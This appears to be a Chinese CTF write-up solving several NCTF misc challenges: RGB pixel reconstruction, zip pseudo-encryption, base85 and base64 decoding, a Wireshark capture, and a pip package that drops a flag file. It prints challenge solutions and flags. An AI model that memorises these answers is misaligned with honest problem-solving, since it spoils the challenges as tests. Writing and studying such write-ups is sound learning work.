盲猜是RGB像素点,把格式改一下用下面的脚本导出图像
#coding=utf-8
from PIL import Image
x = 500 #x坐标 通过对txt里的行数进行整数分
y = 100 #y坐标 x * y = 行数
im = Image.new("RGB", (x, y))
file = open('1.html')
for i in range(0, x):
for j in range(0, y):
line = file.readline() #获取一行的rgb值
rgb = line.split(", ") #分离rgb,文本中逗号后面有空格
im.putpixel((i, j), (int(rgb[0]), int(rgb[1]), int(rgb[2])))
im.save('flag.jpg')
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 0x27 键盘侠
下载一个zip伪加密
里面一张大的不科学的图
直接上foremost
得到一个docx
说是隐藏字符
打开docx隐藏字符显示
得到这么一串东西
PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE
想了很久。。
甚至打开xml发现密文分三段。。。还有个hint:eastAsia
以为是某种多表代换?
最后也没做出来
结果最后告诉我是个base85..........
python3
>>> import base64
>>> base64.b85decode('PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE')
b'NCTF{Ba3e85_issssss_so_xxxxx}'
1
2
3
4
2
3
4
# 0x28 What's this
WireShark找到大文件点导出字节流存储为zip
发现还是个伪加密
里面一堆base64
多行的解不出来,应该就是base64隐写了
跑一下脚本就得到flag....
(一开始可能复制错了结果没跑出来。。。。。)
# 0x29 2077
点开一看发现是2077的“官方”解密视频
应该会有大佬解过
所以Google Cyberpunk 2077 stream decode.
然后找到一个帖子 https://www.reddit.com/r/pcgaming/comments/9an6mn/cd_projekt_red_twitch_live_with_cyberpunk_2077/ ,解密结果是一张图
下载后用 sha256sum 命令求 sha256 值即可。
# 0x2A pip install
直接把pip 下下来的包拿来分析
里面有一串神奇的编码。。。。
tmp_file = tempfile.gettempdir() + path.sep + '.f14g_is_here'
f = open(tmp_file, 'w')
f.write('TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9')
f.close()
1
2
3
4
2
3
4
用base64就能解码出来
编辑 (opens new window)
上次更新: 2022/05/18, 16:49:51
